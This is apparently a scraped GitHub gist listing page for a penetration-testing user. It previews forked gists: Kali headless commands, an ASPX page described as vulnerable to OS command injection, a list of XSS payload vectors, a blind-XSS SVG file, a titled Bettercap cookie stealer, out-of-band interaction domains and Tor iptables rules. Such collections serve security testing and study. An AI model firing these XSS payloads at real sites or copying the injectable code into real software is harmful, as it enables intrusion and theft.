Kali Headless Mode Configuration
Disabling the GUI/X/Head
systemctl set-default multi-user.target
systemctl get-default # shows new default mode
reboot
CalfCrusher
/ kali-headless.md
Created Jan 27, 2023
— forked from xErik/kali-headless.md
Configuring Headless (no X, GUI) Kali, Running In VirtualBox
View kali-headless.md
CalfCrusher
/ ping.aspx
Created Jan 11, 2023
— forked from stasinopoulos/ping.aspx
Simple ASPX application (vulnerable to OS command injections)
View ping.aspx
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="C#" Debug="true" Trace="false" %> | |
| <%@ Import Namespace="System.Diagnostics" %> | |
| <%@ Import Namespace="System.IO" %> | |
| <script Language="c#" runat="server"> | |
| void Page_Load(object sender, EventArgs e){ | |
| } | |
| string ExcuteCmd(string arg){ | |
| ProcessStartInfo psi = new ProcessStartInfo(); |
CalfCrusher
/ gist:55e1505e027b48dc5de41e9f65a8069b
Created Jan 10, 2023
— forked from sempf/gist:f44714afe0050b83b6e647261d53b43e
666 XSS Vectors collected from the web
View gist:55e1505e027b48dc5de41e9f65a8069b
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
CalfCrusher
/ xss-image.svg
Created Jan 10, 2023
— forked from rudSarkar/xss-image.svg
SVG Image XSS File
View xss-image.svg
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
CalfCrusher
/ Blind XSS in SVG FILE
Created Jan 10, 2023
— forked from ioribrn/Blind XSS in SVG FILE
View Blind XSS in SVG FILE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" standalone="no"?> | |
| <!DOCTYPE svg PUBLIC | |
| "-//W3C//DTD SVG 1.1//EN" | |
| "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> | |
| <svg width="200" | |
| height="200" | |
| zoomAndPan="disable" | |
| xmlns="http://www.w3.org/2000/svg" | |
| xmlns:xlink="http://www.w3.org/1999/xlink" | |
| xml:space="preserve"> |
CalfCrusher
/ responder-n-cookies.js
Created Dec 11, 2022
— forked from leoloobeek/responder-n-cookies.js
Bettercap Responder injection and cookie stealer
View curl.md
Common Options
-#, --progress-bar
Make curl display a simple progress bar instead of the more informational standard meter.
-b, --cookie <name=data>
Supply cookie with request. If no =, then specifies the cookie file to use (see -c).
-c, --cookie-jar <file name>
File to save response cookies to.
View Vagrant OSX Setup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Vagrant | |
| Create and configure lightweight, reproducible, and portable development environments. Vagrant is an amazing tool for managing virtual machines via a simple to use command line interface. | |
| Before you start | |
| In order to simplify the installation process you should install homebrew-cask which provides a friendly homebrew-style CLI workflow for the administration of Mac applications distributed as binaries. Refer to this article in order to install homebrew-cask. | |
| Install | |
| Vagrant uses Virtualbox to manage the virtual dependencies. You can directly download virtualbox and install or use homebrew for it. |
CalfCrusher
/ Out of band interaction domains
Created Oct 29, 2022
— forked from breakersall/Out of band interaction domains
External service interaction domains
View Out of band interaction domains
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| interact.sh | |
| oast.pro | |
| oast.live | |
| oast.site | |
| oast.online | |
| oast.fun | |
| oast.me | |
| burpcollaborator.net | |
| oastify.com | |
| canarytokens.com |
CalfCrusher
/ route-traffic-through-tor-iptables.md
Created Oct 25, 2022
— forked from jkullick/route-traffic-through-tor-iptables.md
Route all Traffic through Tor for specific User on Linux with IPTables
View route-traffic-through-tor-iptables.md
iptables -A OUTPUT -p icmp -j REJECT
iptables -t nat -A OUTPUT ! -o lo -p tcp -m owner --uid-owner $USER -m tcp -j REDIRECT --to-ports 9040
iptables -t nat -A OUTPUT ! -o lo -p udp -m owner --uid-owner $USER -m udp --dport 53 -j REDIRECT --to-ports 53
iptables -t filter -A OUTPUT -p tcp -m owner --uid-owner $USER -m tcp --dport 9040 -j ACCEPT
iptables -t filter -A OUTPUT -p udp -m owner --uid-owner $USER -m udp --dport 53 -j ACCEPT
iptables -t filter -A OUTPUT ! -o lo -m owner --uid-owner $USER -j DROPNewerOlder